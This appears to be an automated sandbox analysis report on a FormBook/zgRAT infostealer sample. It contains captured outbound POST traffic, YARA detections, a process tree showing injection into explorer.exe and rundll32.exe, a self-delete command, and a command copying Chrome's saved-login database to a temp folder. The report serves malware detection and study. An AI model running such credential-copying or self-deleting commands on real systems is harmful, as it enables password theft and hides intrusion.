50 6f 73 67 46 7a 6c 70 52 66 78 4b 75 75 76 66 42 76 58 4d 70 38 50 66 76 64 59 33 66 6f 4d 32 65 7e 30 42 63 50 38 7e 35 6e 51 56 57 69 77 73 33 28 50 6d 31 28 41 39 41 7a 33 32 6c 31 65 46 32 44 42 66 4d 59 52 69 4e 31 52 7e 41 30 45 6c 44 6f 61 4c 67 4c 62 41 44 4f 68 57 58 64 65 6e 7a 49 46 4e 70 43 35 49 73 69 71 7e 74 47 6d 63 68 44 77 59 52 32 71 50 6d 36 7a 31 75 4d 4a 6e 66 28 5f 28 31 55 4a 46 52 36 63 74 49 61 45 6e 75 73 37 4f 53 73 4d 52 4c 56 4e 41 54 28 6e 4a 61 62 71 53 57 34 56 67 45 64 33 43 46 53 46 44 41 50 76 41 50 65 5f 76 63 61 61 71 4b 44 67 67 6c 52 4e 75 6d 6a 44 6f 6f 68 65 58 5f 78 4f 48 78 63 6d 73 54 51 42 6c 32 65 74 67 67 5a 5f 67 4f 61 72 6b 31 6e 56 4b 68 63 62 4f 51 5a 53 6e 7a 41 45 28 55 73 73 31 31 4c 4d 55 46 36 37 39 38 65 39 42 41 51 41 4a 4f 79 76 7a 35 5a 77 7a 6f 58 2d 54 32 54 72 54 57 50 45 4c 50 34 4b 54 4e 62 53 43 5f 4f 71 6f 65 33 48 43 6b 69 75 71 30 75 34 37 56 49 5f 4f 6f 71 65 5a 78 4b 77 54 4a 6d 39 65 77 6f 53 45 39 75 44 53 67 64 71 61 4d 49 49 65 78 69 78 78 4d 56 41 44 49 28 38 6f 66 55 65 44 54 44 68 6d 53 63 36 56 31 4e 4e 72 5f 7a 38 75 4b 4a 6f 34 77 38 67 6e 48 50 42 4e 4e 62 68 72 76 74 62 4b 6b 45 63 74 34 34 4a 32 62 77 42 35 2d 6a 43 6c 4d 6b 74 4e 72 6e 4f 30 46 72 4b 78 68 7a 75 69 4a 67 34 4c 47 37 4d 58 79 69 4b 69 42 4b 6c 44 43 43 45 6b 4b 6a 79 58 55 41 32 4c 52 63 39 70 6e 4f 62 73 65 32 73 61 55 46 67 58 34 71 59 44 55 64 6c 4e 6f 39 61 48 50 59 58 7e 34 43 69 37 6c 36 43 35 36 44 39 35 34 54 66 42 73 37 34 4a 35 30 4c 48 70 61 44 71 33 46 45 67 31 39 73 55 32 4c 44 39 33 50 50 79 64 33 6f 6f 54 4e 71 38 6a 4b 56 57 73 77 76 56 4c 6f 71 7e 2d 64 47 44 71 33 35 35 4c 5a 7a 43 45 7e 74 65 36 6a 79 44 76 73 30 38 31 46 38 56 49 6f 35 73 48 65 33 30 4e 46 45 75 70 6e 4d 4d 65 61 48 35 2d 70 38 42 32 6c 51 76 4f 7a 4e 6a 56 4a 77 44 5f 58 7a 7a 32 61 6d 33 79 4c 35 61 55 43 65 76 62 53 76 52 4b 67 74 67 34 36 53 6b 46 50 63 4e 61 32 67 42 54 43 44 44 37 72 36 32 65 5a 5f 76 54 43 63 6a 4e 7a 79 35 63 33 62 41 51 37 5f 62 67 64 2d 4f 69 49 67 31 5f 47 41 6e 46 47 74 59 47 4b 74 64 55 67 77 6f 64 7e 74 44 68 69 52 63 74 4d 6c 51 2d 66 61 4c 7a 50 48 4a 50 34 78 7a 73 51 51 77 78 56 71 63 68 77 45 6f 41 4e 74 4d 49 69 61 5a 4e 28 2d 57 65 4a 72 32 39 49 7a 32 5f 6d 38 35 69 65 35 68 6f 57 64 62 66 7e 71 39 31 7a 77 6d 4c 79 76 28 54 6d 56 6d 6a 34 62 70 63 34 42 39 6e 63 5a 68 67 50 48 53 50 66 49 66 54 33 77 55 54 6a 2d 67 65 6a 6a 49 35 6f 75 4b 34 35 4b 7a 43 64 45 59 66 54 36 5a 49 79 62 45 6d 77 72 46 75 4f 64 5a 62 33 78 6f 75 77 52 51 72 43 31 4d 50 37 6f 4d 33 66 32 44 49 6f 70 66 49 79 73 64 54 34 64
                                                                                                          Data Ascii: bT7tPLpx=7WKKd8FSf99xdvNzYovvHQ0nex3FzLYVGGDu8g~POY5zXFBR(i83MUAQt6y-~9ZzJlCChBEYLEehC4dzDkWzrUQYv5C0AtUVGLCQT9nebQbV1bxCoeyQ~2~Fn0WeF0pPQN4gs_nSsTeOwaPFlvyPUAoWqEZDVJ6IvgAenlO0gfjUVqAMTPB-zqxHeO38vudLLiHl9NA86qW6~lJhmwcByJD5AXStigut5Ka3waUmMWSdJS18nVXX5z4XnQqoWMSbH6r7qgmA37cMD7byJc3l6tyJ5n3ZPCE3MdXEAYgia64wvLCLLp3RVnQkzYgw0lyTQuC2OU2TRKyfNJ(9ty9T8k~fd0OC6UZxDsxoXbgmI54LnPHpHMbffNd84ki2xat16Q7Vmv33RunmyJ7vgsfGwtzbJW1rqIA2Gteq(woSR0UgLuBURUNUIfH50Tjf5FheSXV73SLE9uWX~VQMlibGDRHAz53J2O~PosgFzlpRfxKuuvfBvXMp8PfvdY3foM2e~0BcP8~5nQVWiws3(Pm1(A9Az32l1eF2DBfMYRiN1R~A0ElDoaLgLbADOhWXdenzIFNpC5Isiq~tGmchDwYR2qPm6z1uMJnf(_(1UJFR6ctIaEnus7OSsMRLVNAT(nJabqSW4VgEd3CFSFDAPvAPe_vcaaqKDgglRNumjDooheX_xOHxcmsTQBl2etggZ_gOark1nVKhcbOQZSnzAE(Uss11LMUF6798e9BAQAJOyvz5ZwzoX-T2TrTWPELP4KTNbSC_Oqoe3HCkiuq0u47VI_OoqeZxKwTJm9ewoSE9uDSgdqaMIIexixxMVADI(8ofUeDTDhmSc6V1NNr_z8uKJo4w8gnHPBNNbhrvtbKkEct44J2bwB5-jClMktNrnO0FrKxhzuiJg4LG7MXyiKiBKlDCCEkKjyXUA2LRc9pnObse2saUFgX4qYDUdlNo9aHPYX~4Ci7l6C56D954TfBs74J50LHpaDq3FEg19sU2LD93PPyd3ooTNq8jKVWswvVLoq~-dGDq355LZzCE~te6jyDvs081F8VIo5sHe30NFEupnMMeaH5-p8B2lQvOzNjVJwD_Xzz2am3yL5aUCevbSvRKgtg46SkFPcNa2gBTCDD7r62eZ_vTCcjNzy5c3bAQ7_bgd-OiIg1_GAnFGtYGKtdUgwod~tDhiRctMlQ-faLzPHJP4xzsQQwxVqchwEoANtMIiaZN(-WeJr29Iz2_m85ie5hoWdbf~q91zwmLyv(TmVmj4bpc4B9ncZhgPHSPfIfT3wUTj-gejjI5ouK45KzCdEYfT6ZIybEmwrFuOdZb3xouwRQrC1MP7oM3f2DIopfIysdT4dLg~jlRl3m3csDu93UebzLBSMRsIDMInot-f_6Gxr9j(6PcwILqZFkmhqeZjokA3B96GCtiC1RbRenV6N7CTAqKy_dbQF1OgJ(FRUjSAyJSMTLy9ldCbxD5o8hO6hk9WslHnlbyGt2LuGtwjx2KOgJX1rpwCOvCrsn-3u0e8D39qFzpwx51TTzXC-N6MutWT5Wl8FryJdJ1v0WT7eLEsoNx(mHzCvaSbGcl684CVJ1cBEE6BpozgVFPn8NVmlVIuTE1g8qboLYicEocwa6vSp(pOA4WAp(ba8kM34FOAJqe8ZMAT-2gfscCp22-vG8YD5wqRUHXP01bd4tEUsL1LVOAR0oshO9fUoJgzFBsvegRFjfOCWa0OgkXeLFENHO5GIbxvFQqLbta0ZffNdpY3uzvGAbpC-q06gtG5R5hwOTLxjb3k05Hhv2GwZNVbGVge0C3oKPffQiU4QiEFxNGmt0j5ia9A5YfXJYtvXPVuMR3QlPzWcziuRSWOApQh142HD6wN6DBEZEJB-w1ymbxSnILNhlp6oTEUtklwDitGU9hKTRLUHmjKu39L7~WqXmxiA3Z4wEtGtfNzla6YGE3gWE0KNtGqD7tdmJVxA9PN66I7m1vO3ckqoogFWLNbrGiPzk6p92YiU6M1M9ZekqTj6Ft0BH7lAPW5w5CmWjPxipeb1pNSv9Q(7KUXTj_TCk-iKFKzRzbqV5U427d6f7_mWVl6CJivy3ahHdRtMbZrrdS81muL6sklq~h7vUombCYc_2yByGiEd5rQ275eqZbk4iWz8NENj2XOmlCh-Nip3YotfQaJCkfjg2DQHv5hxCInBMYrp5fxQeTqBEvqwJtj8to8AYjAWSlGhTKzq88AtgM3TaCAUyl5fbp98FO3HyZWwRrJtdLZxeU1MmpEhCQt9EraFovESyjUScT1DUlN2EMnlwaw_TInlbKDbXuDftDNbvt3DEjox8NPxFxSfJusrsQx0abUejD~2LRYVWW1xnLrCbrM67jyuGfD7V1le(H29uLQWBYra9iCAqiMe09hy1OfTEVCrEEzM1yyP39L_tnGPEvmeIi8ITj~2qsaYYSGPtzISOQIqABM3zWoulmBNvRygsyI4mEoOpbpqyN334VZEpr~vP3AllXz5ITOP9DySvcIQB4RiBifMrEqJKSyWVwtrMJZ_2Vlq8RmGySsReOmpEK4cImhwWkCYyYzX0cYuctY0r1f0aJNoZ1elRVWBy9Rkxzk8SM1RbGV23W12DmeB6DkVsqsJamWKPebDKXk5RdHYhSqWnKj53VoJdi24x_GOX39dMB3irZG1ZHI-gK5McDip383geP3tJYTSOE73kAu8wf(3TAcPySw6tXcWG9jY(Vx1bz9Va1t_rP7Hg-EWvQBZ4jZsOIdYorgNRJYHKGm5XmszHrCkuIaYPKeF~Q52oHrMsj~gGdL7KkR0Z3t8yqsWoAaQ1sxbcHA4bPas~0nNrF5NVD~2QPAbq0VkVPD6xXbbRqEFMwf-M5DgOmqoIIxaLMefWM(AQsehkh3d5gxJE3CrVRTZEbat3xnj31BIOX4AxiIxuz6SUjez~lJHnsFFTe65psWbbuclaUMVbT29hp1mkqrqx08scHGI5J2ePre4MQX42ZreKG6lANaZCZp_8SQXCdNuvtw4AGwN0LOSBb85NYSIoh(bN6uswzNGEh0dwRFSiI75z0Ihn-7UPmTQGxmpOD82C5NfVKRzyXsVgWST6T9OvQ2hfBNHB-PS4rBSb4qKxTxysaLNzJOf3GkZ2sBOgFHHj4I0KZWTpENSMB(45odvz9bFLIibfrsAwhxFYMyQmFrQJvgLRqD7dkcmMUdVgpyws6gNw1krRVLrafyzi9aNchNtr8DCokgEN4JRxqhkZgyV1-zRtlOVnkK8TvAOOykwOB~X~xG1FOx7Z3ln49wPm3kqg3P5NIOjl85k5ZVS~Eme1DzRFUOTGlAS8HLUyn3koA9w2L88Ebjlhj8lfD1frg7ilsFmnqT7JgL-KGM6C-VEGFbkFhPhhPWIV1SjTeefqIfH802-L82He5gPo1Hdp_RjvXENaBlaOSVMkn4wS0Ib4JzoSP2olniDj7mg2SxrqJVDrMr60Yo8xi2Y8dAVUAer8DyJldpmdx4OQLaANk9OTjCSPA9AHGe26G~axuK2rClHn32BBZMlcXnNoMWN1lhuBMnYjD(fES7ESm(AbnZDnA77GMFjDJSxGMlQtMiAXVpBAInqbLyovn8s0Cf7um76~rbvJOgHqnaavaZE0KLIKSXig1OYjFuEDcDLSyWKaVkN8u8KIwZvoJuwiy(br6dwWrYutatseTiWQ1nyNLZjNqPnrpuU(yC_VjDwTSv_B7JvdGds(zI2Me1_4_JFVKY3MdVfT33-YhlER861BsHuNiRQBuWe5-IKgC1q~7PSeMZRoEIo5VS3vksz1ijai9KiXjuuMGbZML4_sR~j1iVCiVTkdhxet8XO5AxFzvpXDUJuUoIZX4F_LfFbu-F3xIhqeb8sNVoboGIA1DzVJveaheJlaMTgK0b-vi8D5j88BC0Aw0z_OWOS(RgajHhFB4Yf3aQKkFBAxJo2LTSm9aTHqLNpKryufiiO~8ZncaDsaYqNmxGlsQOM(5wEf6SukaV3mfsJ5z2Ddrqiz6P3uEfTcMQypeX7rhPcudFlCcGPA15QKq2F(p08R2bOrdw1rEPN124j(SjlAk8koX2_lK3
                                                                                                          Jun 3, 2022 08:17:49.218961954 CEST10615OUTData Raw: 69 30 6c 59 58 6a 50 58 57 50 4e 4a 6a 38 75 76 66 32 78 6f 74 33 49 64 49 31 4a 4a 62 63 5a 41 59 66 45 65 64 59 77 78 77 4b 33 38 70 49 72 6d 64 6e 7a 71 64 63 55 42 56 39 56 49 6a 6c 61 5a 4b 6f 6c 51 74 30 59 68 6e 71 78 65 28 72 5a 6f 6e 73
                                                                                                          Data Ascii: i0lYXjPXWPNJj8uvf2xot3IdI1JJbcZAYfEedYwxwK38pIrmdnzqdcUBV9VIjlaZKolQt0Yhnqxe(rZonsI1beHF16~oQQNbrcaBHrmIJCgkj-6s3qLNMpQ6ClCJ1SUIoAfon2YUswE9DMXram4mQkz18tUW2wh3P3qSRvhGuoxr6ntjVZbLnAbcECNRAwpqDwheoD06FaseNvfXklIwce6_hZIt9V9QnWeIPF38i_6HoDCqkOY
                                                                                                          Jun 3, 2022 08:17:49.219019890 CEST10620OUTData Raw: 73 51 39 71 58 75 38 46 68 66 78 69 53 2d 74 5a 55 4a 39 55 59 39 50 63 6c 69 47 79 28 76 74 78 32 4c 30 67 44 7a 72 72 4c 38 62 55 79 53 44 65 62 58 61 66 74 62 6e 35 37 4a 64 38 6d 76 48 62 34 68 55 4a 54 4e 4d 6b 4c 67 63 4e 58 54 56 34 76 35
                                                                                                          Data Ascii: sQ9qXu8FhfxiS-tZUJ9UY9PcliGy(vtx2L0gDzrrL8bUySDebXaftbn57Jd8mvHb4hUJTNMkLgcNXTV4v5tbCXub0uVyKpYyQanjWCqOQS2GWJlrbDMRKUY4rLM43DYq0CwPUHdMtOO7IWDtEW9Bea7ek0RZlEn6rfxzImyZkgZuOzTUQzxAEOHM6onQYXkUrIbQ(UtYMvujeoa7xrjnl1QGfF6qczw2tE02IBteMbVbtuo05Za
                                                                                                          Jun 3, 2022 08:17:49.420046091 CEST10664OUTData Raw: 36 4a 58 72 78 6d 53 69 4c 4d 47 73 35 49 6d 4d 31 42 6a 46 71 4f 31 44 68 57 4e 36 48 68 45 45 59 6a 35 68 48 50 51 6f 61 4b 42 32 47 72 36 65 39 68 7e 34 6c 78 6a 78 4a 5f 73 75 64 67 31 59 78 59 58 2d 79 77 44 38 7a 4b 28 51 47 76 36 7a 59 48
                                                                                                          Data Ascii: 6JXrxmSiLMGs5ImM1BjFqO1DhWN6HhEEYj5hHPQoaKB2Gr6e9h~4lxjxJ_sudg1YxYX-ywD8zK(QGv6zYHv_N3IA6MSxK62Lxvmgwpa95tEpf8vLRjZ3shauB2Hm3LQTsdQWPG3uU7tmy2gicSLd0hV40mgfY-6pYurgOiPNBFv_W7srDdLnJhBNOrj4HIWhuT9xUuIzV_SPa8eK3wBxtsX83rGGoCeF1tRKj7JG6iCEpiPR3BS
                                                                                                          Jun 3, 2022 08:18:49.617053986 CEST11191INHTTP/1.1 504 Gateway Time-out
                                                                                                          Server: nginx
                                                                                                          Date: Fri, 03 Jun 2022 06:18:49 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 176
                                                                                                          Connection: close
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body bgcolor="white"><center><h1>504 Gateway Time-out</h1></center><hr><center>nginx</center></body></html>


                                                                                                          Statistics

                                                                                                          CPU Usage

                                                                                                          Click to jump to process

                                                                                                          Memory Usage

                                                                                                          Click to jump to process

                                                                                                          High Level Behavior Distribution

                                                                                                          Click to dive into process behavior distribution

                                                                                                          Behavior

                                                                                                          Click to jump to process

                                                                                                          System Behavior

                                                                                                          General

                                                                                                          Target ID:0
                                                                                                          Start time:08:15:19
                                                                                                          Start date:03/06/2022
                                                                                                          Path:C:\Users\user\Desktop\TT copy.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\Desktop\TT copy.exe"
                                                                                                          Imagebase:0x520000
                                                                                                          File size:661504 bytes
                                                                                                          MD5 hash:6443C909D7E8034F945F3E1DC138A046
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.287883851.0000000002983000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: 00000000.00000002.294087756.0000000007160000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.287958133.00000000029A8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.289098231.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.289098231.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.289098231.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          Reputation:low

                                                                                                          General

                                                                                                          Target ID:3
                                                                                                          Start time:08:15:30
                                                                                                          Start date:03/06/2022
                                                                                                          Path:C:\Users\user\Desktop\TT copy.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Users\user\Desktop\TT copy.exe
                                                                                                          Imagebase:0x520000
                                                                                                          File size:661504 bytes
                                                                                                          MD5 hash:6443C909D7E8034F945F3E1DC138A046
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.357881887.0000000000F70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.357881887.0000000000F70000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.357881887.0000000000F70000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.355171792.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.355171792.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.355171792.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.277077283.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.277077283.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.277077283.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.352260346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.352260346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.352260346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.276708609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.276708609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.276708609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          Reputation:low

                                                                                                          General

                                                                                                          Target ID:7
                                                                                                          Start time:08:15:37
                                                                                                          Start date:03/06/2022
                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\Explorer.EXE
                                                                                                          Imagebase:0x7ff6f3b00000
                                                                                                          File size:3933184 bytes
                                                                                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.320130923.000000000AFE2000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.320130923.000000000AFE2000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.320130923.000000000AFE2000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.338379852.000000000AFE2000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.338379852.000000000AFE2000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.338379852.000000000AFE2000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Target ID:15
                                                                                                          Start time:08:16:03
                                                                                                          Start date:03/06/2022
                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe
                                                                                                          Imagebase:0xfc0000
                                                                                                          File size:61952 bytes
                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.774935226.0000000003430000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.774935226.0000000003430000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.774935226.0000000003430000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.775282393.0000000003660000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.775282393.0000000003660000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.775282393.0000000003660000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Target ID:16
                                                                                                          Start time:08:16:12
                                                                                                          Start date:03/06/2022
                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:/c del "C:\Users\user\Desktop\TT copy.exe"
                                                                                                          Imagebase:0x1190000
                                                                                                          File size:232960 bytes
                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Target ID:17
                                                                                                          Start time:08:16:13
                                                                                                          Start date:03/06/2022
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff647620000
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Target ID:28
                                                                                                          Start time:08:17:19
                                                                                                          Start date:03/06/2022
                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:/c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
                                                                                                          Imagebase:0x1190000
                                                                                                          File size:232960 bytes
                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Target ID:29
                                                                                                          Start time:08:17:20
                                                                                                          Start date:03/06/2022
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff647620000
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          Disassembly

                                                                                                          Reset < >

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:9%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:89
                                                                                                            Total number of Limit Nodes:7
                                                                                                            execution_graph 23860 e596b0 23863 e597a8 23860->23863 23861 e596bf 23864 e597bb 23863->23864 23866 e597d3 23864->23866 23871 e59a20 23864->23871 23875 e59a30 23864->23875 23865 e597cb 23865->23866 23867 e599d0 GetModuleHandleW 23865->23867 23866->23861 23868 e599fd 23867->23868 23868->23861 23872 e59a44 23871->23872 23873 e59a69 23872->23873 23879 e58b38 23872->23879 23873->23865 23876 e59a44 23875->23876 23877 e59a69 23876->23877 23878 e58b38 LoadLibraryExW 23876->23878 23877->23865 23878->23877 23880 e59c10 LoadLibraryExW 23879->23880 23882 e59c89 23880->23882 23882->23873 23883 e5c0c0 DuplicateHandle 23884 e5c156 23883->23884 23885 e542d0 23886 e542e2 23885->23886 23887 e542ea 23886->23887 23891 e543f8 23886->23891 23896 e53a68 23887->23896 23889 e54316 23892 e5441d 23891->23892 23900 e544e8 23892->23900 23904 e544f8 23892->23904 23897 e53a73 23896->23897 23912 e558f0 23897->23912 23899 e56cdc 23899->23889 23901 e5451f 23900->23901 23902 e545fc 23901->23902 23908 e54060 23901->23908 23905 e5451f 23904->23905 23906 e545fc 23905->23906 23907 e54060 CreateActCtxA 23905->23907 23907->23906 23909 e55588 CreateActCtxA 23908->23909 23911 e5564b 23909->23911 23913 e558fb 23912->23913 23916 e55910 23913->23916 23915 e56e4d 23915->23899 23917 e5591b 23916->23917 23920 e55940 23917->23920 23919 e56f22 23919->23915 23921 e5594b 23920->23921 23924 e55970 23921->23924 23923 e57022 23923->23919 23925 e5597b 23924->23925 23926 e5777c 